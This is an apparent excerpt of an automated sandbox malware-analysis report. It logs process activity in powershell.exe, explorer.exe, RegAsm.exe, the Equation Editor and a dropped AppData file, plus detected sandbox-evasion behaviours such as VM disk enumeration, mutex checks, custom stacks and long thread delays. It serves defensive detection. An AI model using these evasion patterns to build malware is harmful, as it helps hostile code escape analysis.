            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Checks if the current machine is a virtual machine (disk enumeration)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDEJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Contains functionality to compare user and computer (likely to detect sandboxes)
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
            Found evasive API chain (may stop execution after checking mutex)
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_24-890
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI/Special instruction interceptor: Address: 7731C7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI/Special instruction interceptor: Address: 7731BFFA
            Source: C:\Users\user\AppData\Roaming\gwseuhaMemory allocated: 390000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaMemory allocated: 550000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599797Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 851Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2113Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1193Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3796Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1544Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 588Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1091Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4830Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 1354
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4493
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 1122
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4041
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 1242
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3984
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3332Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3616Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep count: 1193 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep count: 3796 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -599797s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep count: 1544 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep time: -154400s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3828Thread sleep count: 588 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3832Thread sleep count: 1091 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3832Thread sleep time: -109100s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1340Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep count: 4830 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep time: -483000s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3896Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\System32\taskeng.exe TID: 4012Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuha TID: 4048Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1536Thread sleep count: 1354 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1536Thread sleep time: -1354000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2684Thread sleep count: 4493 > 30
            Source: C:\Windows\explorer.exe TID: 2684Thread sleep time: -4493000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2496Thread sleep count: 1122 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2496Thread sleep time: -1122000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2760Thread sleep count: 4041 > 30
            Source: C:\Windows\explorer.exe TID: 2760Thread sleep time: -4041000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2752Thread sleep count: 1242 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2752Thread sleep time: -1242000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2700Thread sleep count: 3984 > 30
            Source: C:\Windows\explorer.exe TID: 2700Thread sleep time: -3984000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_000C1D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_000C3ED9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_000C2B15
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C6512 GetSystemInfo,19_2_000C6512
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599797Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
